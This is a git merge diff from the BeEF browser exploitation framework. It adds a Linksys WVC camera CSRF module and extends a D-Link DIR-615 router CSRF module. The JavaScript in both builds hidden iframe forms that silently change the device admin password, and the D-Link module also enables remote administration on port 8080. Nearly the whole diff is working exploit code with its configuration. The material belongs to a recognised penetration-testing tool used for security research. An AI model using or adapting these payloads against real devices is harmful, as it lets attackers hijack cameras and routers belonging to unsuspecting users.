Merge branch 'master' of https://github.com/beefproject/beef

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js

@@ -0,0 +1,44 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var path    = 'adm/file.cgi';
+  var passwd  = '<%= @password %>';
+
+  var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST",
+    [{'type':'hidden', 'name':'adm',            'value':'admin'},
+     {'type':'hidden', 'name':'admpw',          'value':passwd},
+     {'type':'hidden', 'name':'admpwv',         'value':passwd},
+     {'type':'hidden', 'name':'language',       'value':'1'},
+     {'type':'hidden', 'name':'h_usernamelist', 'value':''},
+     {'type':'hidden', 'name':'h_language',     'value':'1'},
+     {'type':'hidden', 'name':'h_lang_from_mac','value':''},
+     {'type':'hidden', 'name':'this_file',      'value':'pass_wd.htm'},
+     {'type':'hidden', 'name':'next_file',      'value':'pass_wd.htm'},
+     {'type':'hidden', 'name':'todo',           'value':'save'},
+     {'type':'hidden', 'name':'video_file',     'value':''},
+     {'type':'hidden', 'name':'',               'value':'Submit form'}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(linksys_wvc_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        linksys_wvc_wireless_camera_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Linksys WVC series CSRF"
+            description: "Attempts to change the admin password on a Linksys WVCseries wireless camera."
+            authors: ["bcoles", "n0x00"]
+            target:
+                working: ["ALL"]

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/dlink_dir_615_csrf/command.js

@@ -15,17 +15,18 @@
 //
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
+  var passwd  = '<%= @password %>';
 
   var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
-      [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
-       {'type':'hidden', 'name':'apply', 'value':'Save Settings'},
-       {'type':'hidden', 'name':'admin_name', 'value':'admin'},
-       {'type':'hidden', 'name':'admin_password1', 'value':''},
-       {'type':'hidden', 'name':'admin_password2', 'value':''},
-       {'type':'hidden', 'name':'rt_enable', 'value':'on'},
-       {'type':'hidden', 'name':'rt_enable_h', 'value':'1'},
-       {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'},
-       {'type':'hidden', 'name':'rt_port', 'value':'8080'}
+      [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
+       {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
+       {'type':'hidden', 'name':'admin_name',      'value':'admin'},
+       {'type':'hidden', 'name':'admin_password1', 'value':passwd},
+       {'type':'hidden', 'name':'admin_password2', 'value':passwd},
+       {'type':'hidden', 'name':'rt_enable',       'value':'on'},
+       {'type':'hidden', 'name':'rt_enable_h',     'value':'1'},
+       {'type':'hidden', 'name':'rt_ipaddr',       'value':'0.0.0.0'},
+       {'type':'hidden', 'name':'rt_port',         'value':'8080'}
       ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

modules/exploits/router/dlink_dir_615_csrf/config.yaml

@@ -15,11 +15,11 @@
 #
 beef:
     module:
-        dlink_dir_615_wipe_passwd:
+        dlink_dir_615_csrf:
             enable: true
             category: ["Exploits", "Router"]
             name: "D-Link DIR-615 Password Wipe"
-            description: "Attempts to wipe the password of the admin user on a D-Link DIR-615 router. Enable also remote administration on 0.0.0.0:8080"
+            description: "Attempts to enable remote administration on port 8080 and change the admin password on a D-Link DIR-615 router."
             authors: ["antisnatchor", "n0x00"]
             target:
                 working: ["ALL"]

modules/exploits/router/dlink_dir_615_csrf/module.rb

@@ -13,11 +13,12 @@
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
-class Dlink_dir_615_wipe_passwd < BeEF::Core::Command
+class Dlink_dir_615_csrf < BeEF::Core::Command
   
 	def self.options
 		return [
-			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
 		]
 	end